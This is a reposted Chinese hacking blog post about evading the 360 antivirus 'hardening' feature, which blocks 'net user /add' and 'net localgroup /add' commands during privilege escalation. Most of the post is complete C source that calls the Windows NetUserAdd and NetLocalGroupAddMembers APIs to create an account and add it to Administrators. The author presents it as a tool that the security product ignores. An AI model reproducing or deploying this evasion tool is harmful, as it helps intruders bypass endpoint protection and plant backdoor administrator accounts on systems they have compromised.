转载 突破360防黑加固添加用户

360功能多，现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹，提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xxx/add.360会拦截,如图:

net user 和 net1 user 都被拦截了，改名执行也拦截，想想这功能也不能这么鸡肋。当然360还会拦截其他命令，这次只对net user xxx xx /add做讨论。于是索性自己用C写一个吧，果断被360无视了，如图:

源码：
//Code by Pnig0s1992  
//Date:2012,3,17  
#include <stdio.h>  
#include <Windows.h>  
#include <lm.h>  
 
#pragma comment(lib,"Netapi32.lib")  
 
int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);  
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);  
BOOL ImprovePriv(LPWSTR name);  
 
int main(INT argc,char * argv[])  
{  
    BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME);  
    if(argc < 3)  
    {  
        printf("\nCode by Pnig0s1992");  
        printf("\nUsage:");  
        printf("\n\t%s UserName Password",argv[0]);  
        printf("\n\tRemark:Default add to Group:Administrators.");  
        return -1;  
    }  
    if(bResult)  
    {  
        printf("Successfully promote priv!");  
    }else 
    {  
        printf("Failed promote priv.");  
        return -1;  
    }  
    int Namesize=MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0);  
    wchar_t *wUserName =new wchar_t[Namesize+1];  
    if(!MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize))  
    {   
        return false;  
    }  
    int Passsize=MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0);  
    wchar_t *wPassword =new wchar_t[Passsize+1];  
    if(!MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize))  
    {   
        return false;  
    }  
    LPTSTR lpName = wUserName;  
    LPTSTR lpPassword = wPassword;  
    LPWSTR lpSevName = NULL;  
    LPWSTR lpGroupName = L"Administrators";  
    AddUser(lpName,lpPassword,lpSevName);  
    SetGroup(lpName,lpSevName,lpGroupName);  
    return 0;  
}  
 
BOOL ImprovePriv(LPWSTR name)  
{  
    HANDLE hToken;  
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken))  
    {  
        printf("\nGet process token failed.(%d)",GetLastError());  
        return FALSE;  
    }  
    TOKEN_PRIVILEGES tkp;  
    tkp.PrivilegeCount = 1;  
    if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid))  
    {   
        printf("\nLookup process priv failed.(%d)",GetLastError());  
        return FALSE;  
    }  
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
    if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL))  
    {   
        printf("\nAjust process priv failed.(%d)",GetLastError());  
        return FALSE;  
    }  
    CloseHandle(hToken);  
    return TRUE;  
}  
 
int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName)  
{  
    USER_INFO_1 ui;  
    DWORD dwLevel = 1;  
    DWORD dwError = 0;  
    NET_API_STATUS nStatus;  
    ui.usri1_name = lpUsername;  
    ui.usri1_password = lpPassword;  
    ui.usri1_priv = USER_PRIV_USER;  
    ui.usri1_home_dir = NULL;  
    ui.usri1_comment = NULL;  
    ui.usri1_flags  = UF_SCRIPT;  
    ui.usri1_script_path  = NULL;  
    nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE)&ui,&dwError);  
    if(nStatus == NERR_Success)  
    {  
        printf("\nAdd user:%S successfully!",lpUsername);  
    }else 
    {  
        printf("\nAdd user failed:%d.",nStatus);  
    }  
    return 0;  
}  
 
int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName)  
{  
    NET_API_STATUS nStatus;  
    LOCALGROUP_MEMBERS_INFO_3  lgui;  
    lgui.lgrmi3_domainandname = lpUsername;  
    nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&lgui,1);  
 
    if(nStatus == NERR_Success)  
    {  
        printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName);  
    }else if(nStatus == NERR_GroupNotFound)  
    {  
        printf("\nCan't find such a group:%S.",lpGroupName);  
    }else 
    {  
        printf("\nSet GROUP:%S failed.",lpGroupName);  
    }  
    return 0;  
}